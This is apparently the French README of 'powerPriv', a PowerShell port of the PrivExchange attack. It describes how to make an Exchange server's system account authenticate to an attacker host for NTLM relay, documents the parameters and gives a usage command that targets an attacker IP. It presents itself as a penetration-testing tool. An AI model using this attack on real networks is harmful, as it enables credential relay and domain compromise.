
Une implémentation Powershell de PrivExchange conçue pour s'exécuter dans le contexte de l'utilisateur actuel.
Une implémentation PowerShell de PrivExchange par @_dirkjan (code original disponible ici : https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py) Utile pour les environnements où vous ne pouvez pas exécuter d'applications basées sur Python, où vous avez des identifiants utilisateur, ou où vous ne souhaitez pas écrire de fichiers sur le disque. Provoque la tentative d'authentification du compte système du serveur Exchange cible vers un système de votre choix.
-targetHostNom d'hôte ou IP de la boîte Exchange cible. Selon la configuration DNS, un FQDN peut être nécessaire si vous utilisez un nom d'hôte. (Requis)
-attackerHostNom d'hôte ou IP d'un système que vous contrôlez, et sur lequel vous exécutez idéalement ntlmrelayx. Nous demandons au serveur Exchange de tenter de s'authentifier sur ce système. Selon la configuration DNS, un FQDN peut être nécessaire si vous utilisez un nom d'hôte. (Requis)
-exchangePortPort à utiliser pour tenter de se connecter au serveur Exchange. Par défaut : 443.
-attackerPortPort sur lequel Exchange doit tenter de se reconnecter à l'attaquant. Par défaut : 80
-attackerPagePage que nous demandons au serveur Exchange de contacter sur notre système d'attaque. Les barres obliques ne sont pas nécessaires. Par défaut : powerPriv.
-noSSLDéfinir sur true si vous ne voulez pas utiliser https pour la connexion initiale au serveur Exchange. Par défaut : false (utiliser https).
-VersionVersion du serveur Exchange ciblé. Par défaut : 2013.
powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016
Auteur : @g0ldenGunSec - Basé sur l'outil créé par @_dirkjan
Utilisez cet outil uniquement sur des réseaux que vous possédez ou pour lesquels vous avez l'autorisation de tester.